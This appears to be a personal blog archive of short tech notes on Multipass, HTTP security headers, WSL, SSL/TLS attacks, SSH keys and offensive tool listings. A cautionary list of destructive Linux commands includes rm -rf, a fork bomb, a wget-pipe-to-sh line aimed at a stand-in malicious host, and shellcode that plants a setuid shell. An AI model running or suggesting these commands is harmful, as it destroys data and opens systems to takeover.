Customized a Node.js App in Multipass

This is a short tutorial to:

• Create an Ubuntu VM with cloud-init file
• Install a running Node.js app with a Nginx as the front-end proxy

Cloud-init is a widely used approach to customize a Linux VM as it boots for the first time. It can be used to install packages and write files, or to configure users and security hardening. 

Cloud-init also works across distributions which means it automatically uses the native package management tool for the distro you select.

#cloud-config
package_upgrade: true
packages:
  - nginx
  - nodejs
  - npm
write_files:
  - owner: www-data:www-data
    path: /etc/nginx/sites-available/default
    content: |
      server {
        listen 80;
        location / {
          proxy_pass http://localhost:3000;
          proxy_http_version 1.1;
          proxy_set_header Upgrade $http_upgrade;
          proxy_set_header Connection keep-alive;
          proxy_set_header Host $host;
          proxy_cache_bypass $http_upgrade;
        }
      }
  - owner: webadm:webadm
    path: /home/webadm/myapp/index.js
    content: |
      var express = require('express')
      var app = express()
      var os = require('os');
      app.get('/', function (req, res) {
        res.send('Hello World from host ' + os.hostname() + '!')
      })
      app.listen(3000, function () {
        console.log('Hello world app listening on port 3000!')
      })
runcmd:
  - service nginx restart
  - cd "/home/webadm/myapp"
  - npm init
  - npm install express -y
  - nodejs index.js

Save the YAML as webadmin.yaml and then start creating the VM with Multipass as below:

multipass -n nodejs3k --cloud-init webadmin.yaml

multipass info nodejs3k

Last, open the URL to http://nodejs3k_ip_addr with your browser.

Links:

• Tutorial - How to use cloud-init to customize a Linux virtual machine in Azure on first boot
• cloud-init config examples
  

Multipass Local Privileged Mounts

To access the host storage from the guest VM, we need to setup one-time configuration. First, find out the current configured value:

multipass get local.privileged-mounts

If it is false, then set the value to true:

multipass set local.privileged-mounts=true

 

Then, share the host's local folder (c:\Temp) to guest VM. And check if it is successful.

multipass mount c:\temp jimny:temp

multipass info jimny 

multipass umount jimny:temp

My Third Try on Multipass

After a few rounds of testing, you will find yourself repeating a lot of similar actions whenever creating an instance. For example:

• creating new user
• adding ssh public key
• install Python, htop, Nodejs.....

YES, we can pre-configure all the actions every time a new instance is created. This is done via cloud-init.

First, create a YAML file called "cloud_init.yaml" with the following content.

users:
  - default
  - name: xx
    groups: sudo
    shell: /bin/bash
    sudo: ['ALL=(ALL) NOPASSWD:ALL']
    ssh_authorized_keys:
      - ssh-rsa <rsa keys in one line>
package_update: true
package_upgrade: true
packages:
  - nodejs
  - python3

Second, create a new instance.

multipass launch -c 2 -m 2G -d 10G -n jimny --cloud-init cloud_init.yaml

Last, login to new instance and you will find that apt is both updated and upgraded. Nodejs and Python3 are there waiting for you.

multipass info jimny

multipass shell jimny

ubuntu@jimny:~$ apt list python3 nodejs 

Links:

• First Try on Multipass
• My Second Try on Multipass

My Second Try on Multipass

All these below happen after I install Multipass (on my Windows machine).

To list images available:

multipass find

 

Next is to trying on creating different instance with different config.

To start an instance of Ubuntu:

multipass launch 

To start an instance of Ubuntu with a given name: jimny

multipass launch --name jimny

To start an instance of Ubuntu with specific config

multipass launch -c 2 -m 2G -d 10G -n jimny

To start an instance of docker environment with Portainer

multipass launch docker

Then, to list all the instances

multipass list

To stop and start specific instance

multipass stop jimny

multipass start jimny

In order to login and connect to specific instance

multipass shell jimny

Last to delete the instance

multipass stop jimny

multipass delete jimny

multipass purge 

multipass stop docker

multipass delete --purge docker 

 

Links:

• First Try on Multipass
  

HTTP Security

Here are a few commonly seen HTTP security features.

Content Security Policy (CSP)

Content Security Policy (CSP) is an added layer of security that helps to detect and mitigate Cross-Site Scripting (XSS) and data injection attacks.  

To enable CSP, you need to configure your web server to return the Content-Security-Policy HTTP header.  If the site doesn't offer the CSP header, browsers likewise use the standard same-origin policy. 

CSP makes it possible for server administrators to reduce or eliminate the vectors by which XSS can occur by specifying the domains that the browser should consider to be valid sources of executable scripts. A CSP compatible browser will then only execute scripts loaded in source files received from those allowed domains, ignoring all other scripts (including inline scripts and event-handling HTML attributes).

Examples:

Content-Security-Policy: default-src 'self'

Content-Security-Policy: default-src 'self' example.com *.example.com

Content-Security-Policy: default-src 'self'; img-src *; media-src example.org example.net; script-src userscripts.example.com

Content-Security-Policy: default-src https://onlinebanking.example.com

Content-Security-Policy: default-src 'self' *.example.com; img-src *

Content-Security-Policy: default-src 'self'; report-uri http://reportcollector.example.com/collector.cgi

Using HTTP cookies

An HTTP cookie is a small piece of data that a server sends to a user's web browser. The browser may store the cookie and send it back to the same server with later requests. Typically, an HTTP cookie is used to tell if two requests come from the same browser—keeping a user logged in.

Cookies are mainly used for three purposes: Session management, User preferences, and Tracking.

Instead of using cookies, modern APIs for client storage are the Web Storage API (localStorage and sessionStorage) and IndexedDB. 

Example (set cookies) on sending cookie to client browser.

Set-Cookie: yummy_cookie=choco
Set-Cookie: tasty_cookie=strawberry

Set-Cookie: id=a3fWa; Expires=Thu, 31 Oct 2021 07:28:00 GMT;

Set-Cookie: id=a3fWa; Expires=Thu, 21 Oct 2021 07:28:00 GMT; Secure; HttpOnly

Set-Cookie: mykey=myvalue; SameSite=Strict

Example () on sending stored cookies to web server.

Cookie: yummy_cookie=choco; tasty_cookie=strawberry

Additional ways to mitigate attacjs involving cookies:

• Use the HttpOnly attribute to prevent access to cookie values via JavaScript.
• Use the Secure attribute to prevent MiTM attack and ensure its never sent with unsecured HTTP.
• Use short lifetime, with SameSite attributes to protect sensitive info.
  

 

Same-origin policy (web security)

The same-origin policy is a critical security mechanism that restricts how a document or script loaded by one origin can interact with a resource from another origin. It helps isolate potentially malicious documents, reducing possible attack vectors.  

"Same origin" means the protocol, port (if specified), and host are the same for both. It is referenced as the "scheme/host/port tuple".

For example, an URL at http://store.company.com/dir/page.html will give origin comparison as below:

URL	Reason	Outcome
http://store.company.com/dir2/other.html	Only the path differs	Same origin
http://store.company.com/dir/inner/another.html	Only the path differs	Same origin
https://store.company.com/page.html	Protocol different	Fail
http://store.company.com:81/dir/page.html	Port different	Fail
http://news.company.com/dir/page.html	Host different	Fail

Other schemes or URL, such as javascript: and about:blank, are inherited origins from the page. But data: scheme get a new security context. file:/// schema is treated as opaque origins. 

Use CORS to allow cross-origin access. CORS is a part of HTTP that lets servers specify any other hosts from which a browser should permit loading of content.

 

Strict-Transport-Security (HTTP header)

The HSTS or HTTP Strict-Transport-Security response header informs browsers that the site should only be accessed using HTTPS, and that any future attempts to access it using HTTP should automatically be converted to HTTPS.

This is more secure than simply configuring a HTTP to HTTPS (301) redirect on your server, where the initial HTTP connection is still vulnerable to a man-in-the-middle attack.

Example of all the present and future subdomains will be HTTPS for a max-age of 1 year:

Strict-Transport-Security: max-age=31536000; includeSubDomains

Strict-Transport-Security: max-age=31536000; preload

Strict-Transport-Security: max-age=63072000; includeSubDomains; preload

To detect if a HTTPS server is supporting HSTS, check the post at When HTTPS is not Sufficient.

 

X-Content-Type-Options (HTTP header)

This is a web server HTTP header to indicate that the MIME types advertised in the Content-Type headers should be followed and not be changed. The header allows you to avoid MIME type sniffing by saying that the MIME types are deliberately configured. 

For example, it can cause HTML web pages to be downloaded instead of being rendered when they are served with a MIME type other than text/html.

Site security testers usually expect this header to be set, such as:

X-Content-Type-Options: nosniff

X-Frame-Options (HTTP header)

This is a web server response header to indicate whether or not a browser should be allowed to render a page in a <frame>, <iframe>, <embed> or <object>. Sites can use this to avoid click-jacking attacks, by ensuring that their content is not embedded into other sites.

The Content-Security-Policy HTTP header has a frame-ancestors directive which obsoletes this header for supporting browsers.

X-Frame-Options: DENY
X-Frame-Options: SAMEORIGIN

If you specify DENY, the page cannot be displayed in a frame, regardless of the site attempting to do so.

If you specify SAMEORIGIN, the page can only be displayed if all ancestor frames are same origin to the page itself.

X-XSS-Protection (HTTP header)

This is a server response header sent to browser that stops pages from loading when they detect reflected cross-site scripting (XSS) attacks. These protection is unnecessary when sites implement a strong Content-Security-Policy that disables the use of inline JavaScript ('unsafe-inline').

This feature is not a standard feature for all browsers. Do not use it on production sites facing the Web: it will not work for every user. There may also be large incompatibilities between implementations and the behavior may change in the future.

Directives:

X-XSS-Protection: 0
X-XSS-Protection: 1
X-XSS-Protection: 1; mode=block
X-XSS-Protection: 1; report=<reporting-uri>

Examples:

X-XSS-Protection: 1; mode=block

Apache (.htaccess):

<IfModule mod_headers.c>
  Header set X-XSS-Protection "1; mode=block"
</IfModule>

Nginx:

add_header "X-XSS-Protection" "1; mode=block";

Links:

1. Content Security Policy (CSP)
2. Using HTTP cookies
3. Same-origin policy (web security)
   
4. Strict-Transport-Security (HTTP header)
   
5. X-Content-Type-Options (HTTP header)
6. X-Frame-Options (HTTP header)
7. X-XSS-Protection (HTTP header)
8. HTTP Request Methods 
   

REST API Access to NVD at NIST

NVD - National Vulnerability Database

NIST - National Institute of Standards and Technology

The NVD is the U.S. government repository of standards based vulnerability management data represented using the Security Content Automation Protocol (SCAP). This data enables automation of vulnerability management, security measurement, and compliance. The NVD includes databases of security checklist references, security-related software flaws, misconfigurations, product names, and impact metrics.

There is a vulnerability API access to query NVD directly. It is available at Vulnerability API documentation. An example to retrieve CVE information in JSON format can be access at:

https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2022-1388

At the vulnerability metrics page, NVD is providing 2 CVSS calculators: CVSS_v2 and CVSS_v3.1 calculator, for product integration. For examples:

https://nvd.nist.gov/vuln-metrics/cvss/v2-calculator?name=CVE-2022-1388

https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?name=CVE-2022-1388

Links:

• https://nvd.nist.gov/
• https://nvd.nist.gov/developers/vulnerabilities
• https://nvd.nist.gov/Vulnerability-Metrics/Calculator-Product-Integration

Kubernetes Tutorials

Kubernetes tutorials with hands-on labs with certification at IBM.

This is an interactive browser-based training for deploying and operating a cluster on IBM Cloud® Kubernetes Service. No downloads or configuration required.

There 3 labs are available:

1. Containers and Kubernetes essentials  - To learn the core concepts of Kubernetes and how to use Docker containers on Kubernetes.
2. Scalable web applications on Kubernetes - To learn how to scaffold a web application, run it locally in a container and deploy it to a Kubernetes cluster.
3. Analyze logs and monitor application health - To learn how to analyze different types of logs and monitor the performance of your applications and clusters.

It is estimated to deploy and manage applications in a preconfigured Kubernetes environment available for four hours at no charge.

 

Links:

• https://www.ibm.com/cloud/kubernetes-service/kubernetes-tutorials
• https://developer.ibm.com/openlabs/iks
  

Learn CI/CD Pipeline with Jenkins

Jenkins is an open source automation server which makes it easier to build, test, and deploy software.

Jenkins can help developers automate their software development process and improve their productivity. It can also help users obtain a fresh build of their software project more easily. Jenkins is an important tool for creating a DevOps pipeline.

A DevOps pipeline is a set of processes and tools that enable the continuous delivery of software applications. The term "DevOps" is a combination of the words "development" and "operations." DevOps pipelines are used to automate the build, test, and deploy phases of the software development life cycle.

Watch the full course below or on the freeCodeCamp.org YouTube channel (1-hour watch).

Here are all the sections covered in this course:

•     Course Overview
•     What is Jenkins?
•     Terms & Definitions
•     Project Architecture
•     Linode Intro
•     Setting Up Jenkins
•     Tour of Jenkins Interface
•     Installing Plugins
•     Blue Ocean
•     Creating a Pipeline
•     Installing Git
•     Jenkinsfile
•     Updating a Pipeline
•     Jenkins with nom
•     Docker & Dockerhub
•     Closing Remarks

 

GitHub Actions is another CI/CD tool (similar to Jenkins) for the GitHub flow. You can use it to integrate and deploy code changes to a third-party cloud application platform as well as test, track, and manage code changes. GitHub Actions also supports third-party CI/CD tools, the container platform Docker, and other automation platforms.

Links:

• https://alternativeto.net/software/jenkins/
• https://blog.bitsrc.io/github-actions-or-jenkins-making-the-right-choice-for-you-9ac774684c8
  

Cloud Security and DevOps Automation: Keys for Modern Security Success

 

Notes:

• Intro of Security Controls for Cloud and DevOps.
• 4 keys for modern security success:
  
1. Pre-commit: The Paved Road
2. Commit: CI/CD Security Controls
3. Acceptance: Supply Chain Security
4. Operations: Continuous Security Compliance
   

Links:

• https://www.youtube.com/watch?v=-bQiG4KPuBs
• https://github.com/coreos/clair
• https://github.com/draios/falco
  
• https://github.com/dev-sec
• (Puppet) https://github.com/simp/
• https://github.com/inspec/inspec
• https://github.com/OpenSCAP/
• https://github.com/cloud-custodian/cloud-custodian
• https://github.com/nccgroup/ScoutnSuite
• https://github.com/awslabs/aws-security-benchmark
  

OWASP Amass Project

The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.

This tool maintains a strong focus on DNS, HTTP and SSL/TLS data discovering and scrapping. To do this, it has its own techniques and provides several integrations with different API services like (spoiler alert!) the SecurityTrails API.

Amass enum can be executed under the context of a passive or an active configuration mode. The passive mode is much quicker, but Amass will not validate DNS information, for example by resolving the subdomains.

Links:

• OWASP Amass
• Quick Tutorial & Example Usage
• A solid information gathering tool 
  

 

Attack Tools Collection

Here is a list of attacking tools collected recently.

AutoDeAuth - A tool built to automatically deauth local networks.

Aced - A tool to parse and resolve a single targeted Active Directory principal's DACL. will identify interesting inbound access allowed privileges against the targeted account, resolve the SIDS of the inbound permissions, and present that data to the operator. Additionally, the logging features of pyldapsearch have been integrated with Aced to log the targeted principal's LDAP attributes locally which can then be parsed by pyldapsearch's companion tool BOFHound to ingest the collected data into BloodHound.

Aura - A Python Source Code Auditing And Static Analysis On A Large Scale. It is a static analysis framework developed as a response to the ever-increasing threat of malicious packages and vulnerable code published on PyPI.

Coercer - A Python Script To Automatically Coerce A Windows Server To Authenticate On An Arbitrary Machine Through 9 Methods.

GraphCrawler - GraphQL Automated Security Testing Toolkit. It is the most powerful automated testing toolkit for any GraphQL endpoint. (Req: Python3, Docker Python dependencies)

pycvss3 - Python API for the CVSS v3.

Manage Applications with Winget Tool

Show the installed Winget version

winget -v

Updating existing software with Winget

winget upgrade

Updating specific software with Winget

winget upgrade Microsoft.Office

Updating all software with Winget

winget upgrade -all 

Show Winget software repositories

winget source list

Updating available repositories

winget source update

List all available software in repository

winget list

Revert the changes made to repository

winget source reset --force

Search, Install and Uninstall a software

winget search vlc

winget install VideoLAN.VLC

winget uninstall VideoLAN.VLC

Backup and Restore WSL for Linux

Check WSL version

wsl -l -v 

Backup the (Ubuntu) distro

wsl --export (distribution) (filename.tar)

wsl --export Ubuntu Backup_Ubuntu.tar

wsl --export Ubuntu c:\users\xx\desktop\Backup_Ubuntu.tar

To restore a WSL distro from a backup

wsl --import (distribution) (install location) (file location and filename)

wsl --import Ubuntu d:\wsl c:\users\xx\desktop\Backup_Ubuntu.tar

Install Linux on Windows with WSL

Prerequisites: Setting up WSL on Windows.

1. Open Command Prompt as Administrator

 

Install WSL 

wsl --install

List the available online Linux distribution

wsl -l -o

wsl --list --online

Install an Ubuntu distribution

wsl --install -d Ubuntu

Check WSL version

wsl -l -v 

Set the default WSL version (1/2)

wsl --set-default-version 2 

Upgrade an Ubuntu to WSL version 2

wsl --set-version Ubuntu 2

Upgrade to WSL2

Links:

• Install Linux on Windows with WSL
• Set up a WSL development environment
• Basic commands for WSL
• Comparing WSL 1 and WSL 2
  

LunarVim

LunarVim is a fast IDE layer for Neovim. Vim, at some point let you be focus on the code, and by that, use the keyboard as the main tool, instead of the mouse.

Here's the list of steps to install LunarVim (and NeoVim) in Ubuntu.

$ sudo apt install software-properties-common -y

$ sudo add-apt-repository ppa:neovim-ppa/stable -y

$ sudo apt update

$ sudo apt install neovim -y

$ bash <(curl -s https://raw.githubusercontent.com/lunarvim/lunarvim/master/utils/installer/install.sh) 

Add lvim to $PATH

If your terminal can't find the lvim command, add the installation folder to your path or move the lvim command to somewhere in your path. The default install folder is ~/.local/bin.
 

 

Links:

• https://www.linuxcapable.com/how-to-install-neovim-editor-on-ubuntu-22-04-lts/
• https://www.lunarvim.org/01-installing.html#prerequisites
• https://www.lunarvim.org/02-after-install.html#add-lvim-to-path 
• https://github.com/neovim/neovim/releases/tag/v0.7.2
• https://github.com/neovim/neovim/wiki/Installing-Neovim
  

 

 

 

10 Destructive Linux Commands

These are the 10 destructive Linux commands that anyone should never run.

1. rm -rf /*
2. echo "Hello" > /dev/sda
3. mv /home/user/* /dev/null
4. mkfs.ext3 /dev/sda
5. :(){:|:&};:
6. > config_filename
7. dd if=/dev/random of=/dev/sda
8. chmod -R 777 /
9. wget http://malicious_source -O- | sh
   

10. char esp[] __attribute__ ((section(“.text”))) /* e.s.p
    release */
    = “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68”
    “\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99”
    “\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7”
    “\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56”
    “\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31”
    “\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69”
    “\x6e\x2f\x73\x68\x00\x2d\x63\x00”
    “cp -p /bin/sh /tmp/.beyond; chmod 4755
    /tmp/.beyond;”;

Read the full article at IT's FOSS.

Links:

• 10 Destructive Linux Commands You Should Never Run
• Fork bomb
  

Reset your Windows Firewall settings

Reset Windows Firewall to its defaults, at command prompt.

Open Command Prompt as administrator, and run the following command:

netsh advfirewall reset

Reset Windows Firewall to its defaults, using PowerShell.

Open PowerShell as administrator, and run the following command:

(New-Object -ComObject HNetCfg.FwPolicy2).RestoreLocalFirewallDefaults()

Links:

• How to reset your Windows Firewall settings (4 methods)
  

IPv6 from scratch - the very basics of IPv6

 

The basics of IPv6, IPv6 addresses, IPv6 scopes - kind of IPv6 for dummies. 😉

Links:

• https://www.youtube.com/watch?v=oItwDXraK1M
• IPv6 cheat sheet
  

Kubernetes crash course: In less than 15 minutes

One of the best video that talks about Kubernetes (within 15 min), which covers the architecture or relationship between API, Scheduler, Controller, Data Store (etcd), Kubelet, KubeProxy, Docker, Pod, Container, Cluster.

Lets understand containers (10 min)

 

Learn and understand about containers, and start creating a docker container with 5 simple steps. It compares between physical machines, virtual machines, and containers.

Container features 

• Logical packaging
• Faster/lightweight than VM
• Less memory intensive
• Easy deployment
• Reduce delivery time
• Help Dev/IT-ops
• Less bugs

5 steps to create container:

1. Develop app.
2. Create Dockerfile.
3. Build a docker image.
4. Run a docker container
5. Push to docker hub.

 

Common Attacks on SSL/TLS

The SSL/TLS protocols are frequently attacked. And understanding past attacks can inform your knowledge as a defender and help you secure current systems. 

So here's a summary of the common attacks targeting these SSL/TLS from Megan Kaczanowski

Below are my notes about the attacks on  BEAST/Heartbleed/Poodle.

Browser Exploit Against SSL/TLS (BEAST)/2011

• MitM attack that impacted SSL 3.0 and TLS 1.0
• Depends on block ciphers (CBC mode) used by TLS.
• Vulnerable to chosen plantext attack.
• BEAST - exploit for CVE-2011-3389

Heartbleed/2012/2014

• Vulnerability found in the heartbeat extension of OpenSSL library.
• Cause leakage of data in unencrypted format including sensitive credentials, documents.
• OpenSSL (the vulnerable versions were between 1.0.1 and 1.0.1f)
• Doesn't leave any abnormal traces in logs.

Padding Oracle On Downgraded Legacy Encryption (POODLE)/2014

• Flaw in SSL 3.0.
• This attack does require a separate attack to gain this access and MiTM.
• Essentially the message is hashed before sending and at the receiving end, and the re-compiled hash is compared to ensure message integrity, but the padding is not included.
• Practically it is impossible to brute force SSL with this this attack and allows for recovering each byte after a maximum of 256 attempts per byte. That means an attacker could compromise a session cookie or other sensitive information in a few minutes.
  

 

 Attack and Mitigation

Attack	Vulnerability	Mitigation
BEAST	CVE-2011-3389	Upgrade to TLS 1.1 and above
Heartbleed	CVE-2014-0160	Upgrade OpenSSL (avoid between 1.0.1 and 1.0.1f)
POODLE	CVE-2014-3566	Disable SSL 3.0

Links:

• Common Attacks on SSL/TLS – and How to Protect Your System
• A Comprehensive Study of BEAST, CRIME, TIME, BREACH, LUCKY 13 & RC4 Biases
• Everything you need to know about the Heartbleed Bug 
• What is the POODLE Attack?
• CISA SSL 3.0 Protocol Vulnerability
•  

ApacheTomcatScanner

ApacheTomcatScanner - A python script to scan for Apache Tomcat server vulnerabilities.

Features:

• Multi-threaded workers to search for Apache tomcat servers.
• Multiple target source possible:   
• Retrieving list of computers from a Windows domain (through LDAP query)   
  
• Reading targets line by line from a file.        
• Reading individual targets (IP/DNS/CIDR) from -tt/--target option.    
• Custom list of ports to test.    
• Tests for /manager/html access and default credentials.    
• List the CVEs of each version with the --list-cves option
  

Links:

• https://github.com/p0dalirius/ApacheTomcatScanner
• https://www.kitploit.com/2022/09/apachetomcatscanner-python-script-to.html
  

SSH Keygen

Public key authentication using SSH (Secure Shell Protocol) is a more secure approach for logging into services than passwords. 

Here's a helpful basic definition:

    "The Secure Shell Protocol is a cryptographic network protocol for operating network services securely over an unsecured network." (Source)

SSH is used between a client and a server both running on the SSH protocol to remotely login into the server and access certain resources through the command line.

There is an open-source version of the SSH protocol (version 2) with a suite of tools called OpenSSH (also known as OpenBSD Secure Shell). This project includes the following tools:

• Remote operations: ssh, scp, and sftp.
• Key generation: ssh-add, ssh-keysign, ssh-keyscan, and ssh-keygen.
• Service side: sshd, sftp-server, and ssh-agent.

Generate an SSH Public Key

We can use ssh-keygen to generate an SSH public key. This will create a key pair containing a private key (saved to your local computer) and a public key (uploaded to your chosen service). 

With the keys, we can login to remote server with public key authentication.

$ ssh-keygen -t rsa -b 4096

Then your SSH private key will be saved at /$HOME/.ssh/id_rsa and public key will be saved in /$HOME/.ssh/id_rsa.pub

To copy the created public key into the authorized_keys file of the remote server, 

$ ssh-copy-id username@remote_host

Links:

• https://www.freecodecamp.org/news/ssh-keygen-how-to-generate-an-ssh-public-key-for-rsa-login/
  

Useful HTML5 Tags

There are some very useful but little-known HTML5 tags that can come in handy, too. They give a semantic meaning to your webpage, bring more accessibility, and make your life easier.

The <abbr> Tag

<p style="font-family: sans-serif;"> Can <abbr title="Artificial Intelligence">AI</abbr> be taught how to reciprocate human emotions?
</p>

The <details> Tag

<details>
    <summary>Table of Contents</summary>
    <ul>
        <li>
            <a href="#web-dev">Web Development</a>
        </li>
        <ul>
            <li><a href="#web-dev-html">HTML</a></li>
            <li><a href="#web-dev-css">CSS</a></li>
        </ul>
       </ul>
 </details>

The <base> Tag

<head>
    <base href="https://bhaveshrawat.pages.dev/assets/">
</head>
<body>
    <figure style="max-width: 480px;">
        <img style="width: 100%;" src="netflix-planform.webp">
        <figcaption>Netflix Planform made with Grid. </figcaption>
    </figure>
    <figure style="max-width: 480px;">
        <img style="width: 100%;" src="hamburger-menu.gif">   
        <figcaption>&lt;input&gt; tag menu bar</figcaption>
    </figure>
</body>

How the oncontextmenu attribute works

<body oncontextmenu="return false"></body>

 

<body>
    <section oncontextmenu="return false"></section>
</body>

The full article can be found at the link below.

 

Links:

• Useful HTML5 Tags You Might Not Know
  

What is Apache Kafka?

 

Apache Kafka® is an open source distributed streaming platform that allows you to build applications and process events as they occur. Tim Berglund (Senior Director of Developer Experience at Confluent) walks through how it works and important underlying concepts. 

As a real-time, scalable, and durable system, Kafka can be used for fault-tolerant storage as well as for other use cases, such as stream processing, centralized data management, metrics, log aggregation, event sourcing, and more.

Te best way to learn about something, is to start digging into it, and get yourself a local Kafka cluster to play around with. There is an article walks you through that process, went with Docker way and hopefully save your some time 😄.

Links:

• Setting up a local Apache Kafka instance for testing 
• Apache Kafka® Quick Start 
• Course | Apache Kafka® Fundamentals  (7 videos)
• Apache Pulsar vs Kafka
• https://developer.confluent.io/get-started/python/#introduction
  

Intel Owl

Intel Owl - Analyze Files, Domains, IPs In Multiple Ways From A Single API At Scale 

IntelOwl was designed with the intent to help the community, in particular those researchers that can not afford commercial solutions, in the generation of threat intelligence data, in a simple, scalable and reliable way.

Intel Owl is composed of analyzers that can be run to retrieve data from external sources (like VirusTotal or AbuseIPDB) or to generate intel from internal analyzers (like Yara or Oletools)

This solution is for everyone who needs a single point to query for info about a specific file or observable (domain, IP, URL, hash).

This application is built to scale out and to speed up the retrieval of threat info.
It can be integrated easily in your stack of security tools to automate common jobs usually performed, for instance, by SOC analysts manually.

Main features:

• Full django-python application
• Customizable, both the APIs and the analyzers
• clone the project, and ready to run on docker
  
• It has dashboard, visualizations of analysis data, and forms for requesting new analysis, etc.

Links:

• https://intelowl.readthedocs.io/en/latest/Introduction.html
• https://github.com/intelowlproject/pyintelowl
• https://www.kitploit.com/2020/08/intel-owl-analyze-files-domains-ips-in.html

Using Python in Power BI

Microsoft Power BI is a business analytics tool which allows users to gain insight from their data. User can easily create an interactive dashboard by just dragging and dropping data columns into the visualization plane.

In this article, Yannawut Kimnaruk will show you how to use Python to leverage the capabilities of Power BI.

What We'll Cover:    

• How to install Python    
• How to set up Python in Power BI    
• How to use Python to get data    
• How to use Python to transform data    
• How to use Python to visualize data
  

Links:

• https://www.freecodecamp.org/news/python-in-powerbi/